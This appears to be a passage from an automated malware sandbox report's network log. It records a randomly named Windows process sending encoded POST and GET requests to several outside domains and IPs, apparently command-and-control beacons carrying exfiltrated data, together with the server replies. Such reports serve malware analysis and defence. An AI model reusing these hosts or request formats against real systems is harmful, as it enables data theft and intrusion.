                                                                    Data Raw: 51 62 55 50 4c 3d 6f 38 49 55 46 49 37 62 6f 6d 4b 4d 48 64 78 70 4b 65 51 72 6b 58 45 74 68 68 63 55 2f 53 66 2b 2b 6c 45 68 35 76 4c 72 56 58 4a 37 57 47 39 49 46 46 68 54 65 71 52 32 2f 68 56 51 36 77 6b 48 51 64 55 32 30 42 62 49 49 30 30 48 48 30 30 52 37 76 62 53 74 76 49 46 35 54 52 53 64 35 35 2b 69 6e 71 4f 4a 36 4f 31 61 66 64 63 73 4a 2f 31 5a 2f 65 50 6c 75 4f 33 6e 70 79 2f 33 59 78 4e 30 34 71 59 6d 51 79 56 50 31 36 76 4e 74 6a 41 48 69 34 52 68 42 4c 4d 67 6e 39 4a 75 62 62 6a 48 6c 75 67 68 68 6f 65 75 57 56 70 50 65 73 67 33 52 30 49 78 6b 4f 68 5a 37 55 6c 31 6e 47 53 51 74 64 33 35 48 52 39 2b 35 50 47 6a 36 78 77 4e 61 66 75 67 30 63 76 52 42 79 55 66 4c 75 58 4d 35 4b 30 59 44 4c 51 31 67 58 47 47 4b 50 4c 54 76 41 47 7a 37 6d 37 55 72 54 4b 2b 42 4e 7a 61 79 4f 6e 31 50 4b 69 39 6c 6f 34 34 61 62 70 32 49 49 4d 75 4d 6e 59 70 41 38 70 43 2f 49 39 78 61 6e 6f 4f 53 76 69 49 41 42 34 50 48 4e 58 2f 57 72 74 36 34 4b 72 39 6e 30 6a 6b 4b 57 58 42 33 33 32 37 53 54 63 72 77 78 6d [TRUNCATED]
                                                                    Data Ascii: QbUPL=o8IUFI7bomKMHdxpKeQrkXEthhcU/Sf++lEh5vLrVXJ7WG9IFFhTeqR2/hVQ6wkHQdU20BbII00HH00R7vbStvIF5TRSd55+inqOJ6O1afdcsJ/1Z/ePluO3npy/3YxN04qYmQyVP16vNtjAHi4RhBLMgn9JubbjHlughhoeuWVpPesg3R0IxkOhZ7Ul1nGSQtd35HR9+5PGj6xwNafug0cvRByUfLuXM5K0YDLQ1gXGGKPLTvAGz7m7UrTK+BNzayOn1PKi9lo44abp2IIMuMnYpA8pC/I9xanoOSviIAB4PHNX/Wrt64Kr9n0jkKWXB3327STcrwxmhjlHjYlizxLAJPtYiv8BmVkusmEaTYZSd69avARiRSADhi13DpTDFkVYhSLN6e6MyBEiKU7sr+Svtf7C+lEcvZ6yu3jxwG4JO9WcpCa1G77djTmVqv9GyVQwZCZ7zzvP920bg+C/8E0VxQubI0eh2dBHaUzEIy8LkwKhq7HaWtzQn0xOpj5bp+/uFHm0/1Iik3ToN6/7gaLt169Xw1hyO+OBBgs/Nx/TMEkQBdzr758i8xpPEcQt8QzM3q3tLnprIazD1yk38g2c9uERy+KYfeAsxTggUXWYt1ENtmRqD9fnjV9kz0tRuroGqElMXdGVqOj3n2/cLfCPWOciwWInYHzL2iSctX+BgcAHiH2j5qMR3KnPnDpsGzE3eB6ZiQiyp8JWmDgO73MFxNmpfhkyXbwgcYG6WRNAco7LHfjIUasTgHNIofDoRZ75iJ3x4AXjjbb5Vg/m1/j5NzB7rRY9hliZq9q9hfS6+7vMvZNcgsm/aL5RDAtAc6F39QmF0KJt528G32TJ+xY0Dot5QNDORa6nmL36ua8U8Tl2BxB7/25bLTSYzgirnqwSdakEFsY2JCilw9ojEDJi5PiI2xvD9E2ksWvPlJG5n78Rza+mnQdo4ICBYGARv+LxWTYvXLUrWKfr6KA84mmwBKICEB0WMaSSuji51MGKgo [TRUNCATED]
                                                                    Jan 11, 2025 08:18:13.226315022 CET658INHTTP/1.1 404 Not Found
                                                                    Date: Sat, 11 Jan 2025 07:18:13 GMT
                                                                    Server: Apache
                                                                    Content-Length: 514
                                                                    Connection: close
                                                                    Content-Type: text/html
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    24192.168.2.749997203.161.43.228806908C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 11, 2025 08:18:15.156759977 CET481OUTGET /6urf/?QbUPL=l+g0G83zvX30P9FhHqUPiCMCp3kC0CiGmxU2wY32UHo7SRAzM3NVc5Nn4wkj2AVHW/hBkkPychobZjIg4/uR7eoy7wVxfJ9K+U+MKKjLOsgjwrfTYLmZqfPCjIDk3pY25vWCr1O4NF+r&ef4=TJYXELnhFJhl HTTP/1.1
                                                                    Host: www.connecty.live
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                    Jan 11, 2025 08:18:15.759304047 CET673INHTTP/1.1 404 Not Found
                                                                    Date: Sat, 11 Jan 2025 07:18:15 GMT
                                                                    Server: Apache
                                                                    Content-Length: 514
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    25192.168.2.74999813.248.169.48806908C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 11, 2025 08:18:20.810429096 CET723OUTPOST /cpgr/ HTTP/1.1
                                                                    Host: www.tals.xyz
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Accept-Encoding: gzip, deflate
                                                                    Origin: http://www.tals.xyz
                                                                    Referer: http://www.tals.xyz/cpgr/
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 218
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                    Data Raw: 51 62 55 50 4c 3d 2f 57 6e 35 7a 4e 57 6c 30 6e 53 61 6f 56 72 77 57 45 30 4a 73 45 72 69 38 42 4e 50 76 37 67 48 4e 70 2f 77 6b 65 4c 72 44 56 47 30 4e 4a 74 36 2f 5a 45 4c 49 69 73 57 7a 67 35 76 52 4e 47 57 4f 74 75 4d 6b 64 79 31 51 63 71 39 6f 4c 6f 38 75 46 4b 5a 51 51 6a 31 76 6e 4d 6d 79 57 47 45 52 56 31 6b 52 47 50 39 50 57 2b 49 50 69 56 37 4d 4b 76 53 52 39 43 35 38 45 75 48 4f 69 71 75 64 31 50 4a 74 70 51 49 65 57 2f 63 74 6d 62 71 78 41 71 6d 49 61 4d 58 4b 32 44 75 34 67 31 52 57 78 55 56 51 2f 61 6c 39 66 38 6a 59 42 77 2f 7a 53 2b 6b 5a 43 78 42 74 6c 2f 53 41 64 74 53 58 7a 4f 45 38 51 78 78 4e 69 7a 6c 76 77 70 32 38 41 3d 3d
                                                                    Data Ascii: QbUPL=/Wn5zNWl0nSaoVrwWE0JsEri8BNPv7gHNp/wkeLrDVG0NJt6/ZELIisWzg5vRNGWOtuMkdy1Qcq9oLo8uFKZQQj1vnMmyWGERV1kRGP9PW+IPiV7MKvSR9C58EuHOiqud1PJtpQIeW/ctmbqxAqmIaMXK2Du4g1RWxUVQ/al9f8jYBw/zS+kZCxBtl/SAdtSXzOE8QxxNizlvwp28A==
                                                                    Jan 11, 2025 08:18:21.266819954 CET73INHTTP/1.1 405 Method Not Allowed
                                                                    content-length: 0
                                                                    connection: close


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    26192.168.2.74999913.248.169.48806908C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 11, 2025 08:18:23.367479086 CET743OUTPOST /cpgr/ HTTP/1.1
                                                                    Host: www.tals.xyz
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Accept-Encoding: gzip, deflate
                                                                    Origin: http://www.tals.xyz
                                                                    Referer: http://www.tals.xyz/cpgr/
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 238
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                    Data Raw: 51 62 55 50 4c 3d 2f 57 6e 35 7a 4e 57 6c 30 6e 53 61 6e 55 62 77 52 58 4d 4a 71 6b 72 6a 35 42 4e 50 6b 62 67 44 4e 70 7a 77 6b 62 76 37 44 6d 69 30 4e 73 4a 36 77 39 6f 4c 4a 69 73 57 34 41 35 32 66 74 47 4e 4f 74 69 71 6b 5a 36 31 51 59 43 39 6f 4b 59 38 74 79 65 61 43 51 6a 7a 69 48 4d 6b 74 6d 47 45 52 56 31 6b 52 47 72 62 50 57 57 49 50 53 6c 37 4d 72 76 64 66 64 43 36 31 6b 75 48 4b 69 71 71 64 31 50 4f 74 6f 38 75 65 55 48 63 74 6b 44 71 78 52 71 6e 47 61 4d 64 46 57 43 44 35 44 4d 42 51 6a 63 41 4a 4d 79 4c 33 59 49 54 51 58 78 64 70 77 79 49 48 54 4a 36 70 6e 62 6b 58 37 77 6e 56 79 4b 63 78 79 46 51 53 56 57 50 69 69 49 79 71 35 64 36 36 36 50 4f 78 41 79 75 72 49 61 63 45 37 2b 2b 54 54 34 3d
                                                                    Data Ascii: QbUPL=/Wn5zNWl0nSanUbwRXMJqkrj5BNPkbgDNpzwkbv7Dmi0NsJ6w9oLJisW4A52ftGNOtiqkZ61QYC9oKY8tyeaCQjziHMktmGERV1kRGrbPWWIPSl7MrvdfdC61kuHKiqqd1POto8ueUHctkDqxRqnGaMdFWCD5DMBQjcAJMyL3YITQXxdpwyIHTJ6pnbkX7wnVyKcxyFQSVWPiiIyq5d666POxAyurIacE7++TT4=
                                                                    Jan 11, 2025 08:18:23.808835983 CET73INHTTP/1.1 405 Method Not Allowed
                                                                    content-length: 0
                                                                    connection: close


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    27192.168.2.75000013.248.169.48806908C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 11, 2025 08:18:25.913553953 CET1756OUTPOST /cpgr/ HTTP/1.1
                                                                    Host: www.tals.xyz
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Accept-Encoding: gzip, deflate
                                                                    Origin: http://www.tals.xyz
                                                                    Referer: http://www.tals.xyz/cpgr/
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 1250
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                    Data Raw: 51 62 55 50 4c 3d 2f 57 6e 35 7a 4e 57 6c 30 6e 53 61 6e 55 62 77 52 58 4d 4a 71 6b 72 6a 35 42 4e 50 6b 62 67 44 4e 70 7a 77 6b 62 76 37 44 6d 71 30 4e 36 56 36 78 63 6f 4c 4b 69 73 57 37 41 35 7a 66 74 47 41 4f 73 4b 32 6b 5a 32 6c 51 61 4b 39 36 35 51 38 36 33 69 61 49 51 6a 7a 2b 33 4d 6c 79 57 48 4f 52 57 64 6f 52 47 62 62 50 57 57 49 50 55 4a 37 63 71 76 64 53 39 43 35 38 45 75 62 4f 69 71 43 64 31 58 42 74 6f 49 59 65 6c 6e 63 74 45 54 71 77 6a 53 6e 5a 71 4d 62 47 57 43 62 35 43 78 62 51 6a 41 62 4a 4d 32 68 33 66 6b 54 42 53 41 46 79 53 75 48 53 77 68 47 72 6c 44 33 63 49 4d 53 4d 51 79 42 37 68 34 33 50 58 69 56 6b 45 45 74 72 65 51 51 72 4a 57 34 34 67 57 4f 6b 39 66 55 63 49 4b 41 4f 69 6f 5a 41 32 64 6a 4c 39 38 2f 37 61 53 4e 57 67 6a 52 50 75 79 56 53 52 74 47 47 6e 4a 63 61 53 65 53 43 48 71 59 4b 4c 47 42 2b 72 77 57 73 72 49 4a 45 78 36 6f 67 37 54 37 34 4f 47 6d 76 6f 44 45 6a 72 69 77 37 58 53 73 4f 5a 78 4f 37 46 36 4e 46 31 30 45 44 6a 41 78 79 4c 75 4e 36 2f 63 49 6b 6d 4f 38 [TRUNCATED]
                                                                    Data Ascii: QbUPL=/Wn5zNWl0nSanUbwRXMJqkrj5BNPkbgDNpzwkbv7Dmq0N6V6xcoLKisW7A5zftGAOsK2kZ2lQaK965Q863iaIQjz+3MlyWHORWdoRGbbPWWIPUJ7cqvdS9C58EubOiqCd1XBtoIYelnctETqwjSnZqMbGWCb5CxbQjAbJM2h3fkTBSAFySuHSwhGrlD3cIMSMQyB7h43PXiVkEEtreQQrJW44gWOk9fUcIKAOioZA2djL98/7aSNWgjRPuyVSRtGGnJcaSeSCHqYKLGB+rwWsrIJEx6og7T74OGmvoDEjriw7XSsOZxO7F6NF10EDjAxyLuN6/cIkmO8Z46rOkp/PsObea8OcmhiQ6udesvJ1eTPGy5CFpWh6ObRAezJaURzY9Yrx6PMDU8ApmBS/8zpeyiRN5+y0moGPXZ2sGTvU9/HG5Pu6M6mj0gzmQT0NRWvins0cT/cUjOlDIzJLL+TNJY5tskGJ2xLxfvT0MFpmO01EojJp8VK+QpV50YifbEmOb7d8NaScM58GKOb2Dg1taYbs1/pbfWZMTOowuCHKw0sNSo7bzvqYeyfAxCPG8koPJdUAQSGpf+5WKrbvkPKNXTNu6JPWkL6JPM5H0YczJtXXcJC/DLyD4xxELd0SZYNW84tguGqkcQZ1GJUruJ1ztJ/m/5lzJA1AFCf5lSIHNHZgwv0COygFk9d/lzzHWyAK0DoNFwGnBQRB137abrLLwBnhCoB1RcGdkoM0Wjmf4drvs2/PCdb6koz0FopyUGcLIK4bcmkUobbetdt2Ycuz6dicaaPHKSKl6OG1MYphbhNtSAdQAwBXOo9UXR4QDMski5xJWzlfswTchJjBLCH1mNpYB109cWKxwxgeDtCprpi4BKsy1NNr/dk4N3TtWE3TQvhXrIqFiVadOwnYAYbbWYvZVWc14gX4tAC/+9PCdk4tLblDCELMgDLmbsBXlO4QLXV8QDFPn2ar9x6OiJpoJrbL/aCWRzSOMSRw1VPTzEgUs [TRUNCATED]
                                                                    Jan 11, 2025 08:18:26.381391048 CET73INHTTP/1.1 405 Method Not Allowed
                                                                    content-length: 0
                                                                    connection: close


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    28192.168.2.75000113.248.169.48806908C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 11, 2025 08:18:28.453018904 CET476OUTGET /cpgr/?QbUPL=yUPZw4O96lKRgUDiLQ4YjgWex0ZVjKNUVr3HqoHreXe2a6Vc78U2VxoX4VUOXe2AKNSXv9msRJ2q39Y75lzjEi3gnykaux6zendXb1ybL2/XUTdEdLrQYsm3xUWbOyfaUl/C4vMGWlHL&ef4=TJYXELnhFJhl HTTP/1.1
                                                                    Host: www.tals.xyz
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                    Jan 11, 2025 08:18:28.912782907 CET399INHTTP/1.1 200 OK
                                                                    content-type: text/html
                                                                    date: Sat, 11 Jan 2025 07:18:28 GMT
                                                                    content-length: 278
                                                                    connection: close
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 51 62 55 50 4c 3d 79 55 50 5a 77 34 4f 39 36 6c 4b 52 67 55 44 69 4c 51 34 59 6a 67 57 65 78 30 5a 56 6a 4b 4e 55 56 72 33 48 71 6f 48 72 65 58 65 32 61 36 56 63 37 38 55 32 56 78 6f 58 34 56 55 4f 58 65 32 41 4b 4e 53 58 76 39 6d 73 52 4a 32 71 33 39 59 37 35 6c 7a 6a 45 69 33 67 6e 79 6b 61 75 78 36 7a 65 6e 64 58 62 31 79 62 4c 32 2f 58 55 54 64 45 64 4c 72 51 59 73 6d 33 78 55 57 62 4f 79 66 61 55 6c 2f 43 34 76 4d 47 57 6c 48 4c 26 65 66 34 3d 54 4a 59 58 45 4c 6e 68 46 4a 68 6c 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?QbUPL=yUPZw4O96lKRgUDiLQ4YjgWex0ZVjKNUVr3HqoHreXe2a6Vc78U2VxoX4VUOXe2AKNSXv9msRJ2q39Y75lzjEi3gnykaux6zendXb1ybL2/XUTdEdLrQYsm3xUWbOyfaUl/C4vMGWlHL&ef4=TJYXELnhFJhl"}</script></head></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    29192.168.2.750002147.255.21.187806908C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 11, 2025 08:18:34.494033098 CET729OUTPOST /u9hy/ HTTP/1.1
                                                                    Host: www.50food.com
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Accept-Encoding: gzip, deflate
                                                                    Origin: http://www.50food.com
                                                                    Referer: http://www.50food.com/u9hy/
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 218
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                    Data Raw: 51 62 55 50 4c 3d 62 6f 34 4c 72 4a 51 70 35 57 6a 52 50 6d 79 50 61 77 69 38 50 4c 75 4b 42 59 31 47 6d 6b 59 39 78 70 2b 30 63 68 64 64 35 68 57 54 56 67 4d 63 55 2f 51 59 45 4a 57 32 70 49 58 34 53 4d 44 2b 4c 45 46 6e 38 79 43 47 67 6a 53 48 52 5a 79 68 34 70 51 5a 43 4c 5a 6c 45 42 72 74 73 41 55 67 48 32 45 72 75 4e 5a 78 6f 61 52 6c 4c 50 77 79 48 54 6a 67 77 32 2f 56 79 62 62 6a 4a 48 42 65 77 43 6f 55 64 55 33 32 47 2f 6b 51 54 51 37 57 53 67 66 36 67 59 4f 64 33 6f 32 67 53 7a 34 67 74 6f 72 57 4f 75 54 6e 38 34 79 64 5a 4a 54 62 6a 62 37 53 6f 30 49 47 4c 34 61 75 58 78 36 54 70 4c 79 61 62 61 52 53 4f 58 4e 57 2b 6a 4d 69 66 51 3d 3d
                                                                    Data Ascii: QbUPL=bo4LrJQp5WjRPmyPawi8PLuKBY1GmkY9xp+0chdd5hWTVgMcU/QYEJW2pIX4SMD+LEFn8yCGgjSHRZyh4pQZCLZlEBrtsAUgH2EruNZxoaRlLPwyHTjgw2/VybbjJHBewCoUdU32G/kQTQ7WSgf6gYOd3o2gSz4gtorWOuTn84ydZJTbjb7So0IGL4auXx6TpLyabaRSOXNW+jMifQ==
                                                                    Jan 11, 2025 08:18:35.081433058 CET309INHTTP/1.1 403 Forbidden
                                                                    Server: nginx
                                                                    Date: Sat, 11 Jan 2025 07:18:30 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 166
                                                                    Connection: close
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    30192.168.2.750003147.255.21.187806908C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 11, 2025 08:18:37.038695097 CET749OUTPOST /u9hy/ HTTP/1.1
                                                                    Host: www.50food.com
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Accept-Encoding: gzip, deflate
                                                                    Origin: http://www.50food.com
                                                                    Referer: http://www.50food.com/u9hy/
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 238
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                    Data Raw: 51 62 55 50 4c 3d 62 6f 34 4c 72 4a 51 70 35 57 6a 52 41 6d 43 50 63 58 2b 38 4a 72 75 4a 45 59 31 47 74 45 5a 56 78 70 79 30 63 67 59 57 35 54 69 54 56 42 38 63 47 72 38 59 42 4a 57 32 6e 6f 57 77 63 73 44 35 4c 45 5a 56 38 7a 2b 47 67 6a 47 48 52 61 6d 68 34 34 51 65 43 62 5a 6e 4d 68 72 72 69 67 55 67 48 32 45 72 75 4e 4d 61 6f 62 31 6c 4b 38 59 79 47 78 4c 6a 73 6d 2f 53 7a 62 62 6a 65 33 42 61 77 43 6f 36 64 56 37 63 47 35 67 51 54 56 2f 57 54 78 66 35 75 59 4f 48 35 49 33 48 55 6d 4e 61 33 62 44 62 44 38 4f 6d 38 71 53 63 59 2f 53 35 35 35 33 2b 32 6c 77 39 50 36 2b 59 41 58 6e 6d 72 4b 32 43 57 34 6c 7a 52 67 6f 38 7a 78 74 6d 4a 74 45 2f 6e 57 79 7a 4b 54 41 4a 73 63 5a 6b 62 42 71 53 32 53 45 3d
                                                                    Data Ascii: QbUPL=bo4LrJQp5WjRAmCPcX+8JruJEY1GtEZVxpy0cgYW5TiTVB8cGr8YBJW2noWwcsD5LEZV8z+GgjGHRamh44QeCbZnMhrrigUgH2EruNMaob1lK8YyGxLjsm/Szbbje3BawCo6dV7cG5gQTV/WTxf5uYOH5I3HUmNa3bDbD8Om8qScY/S5553+2lw9P6+YAXnmrK2CW4lzRgo8zxtmJtE/nWyzKTAJscZkbBqS2SE=
                                                                    Jan 11, 2025 08:18:37.633712053 CET309INHTTP/1.1 403 Forbidden
                                                                    Server: nginx
                                                                    Date: Sat, 11 Jan 2025 07:18:33 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 166
                                                                    Connection: close
